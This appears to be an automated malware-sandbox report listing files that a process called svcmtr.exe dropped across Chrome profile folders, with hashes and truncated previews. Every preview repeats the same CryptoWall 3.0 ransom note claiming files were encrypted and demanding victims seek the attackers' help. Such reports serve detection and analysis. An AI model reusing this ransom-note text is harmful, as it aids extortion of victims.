                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.html

                                                                                                                          Download File
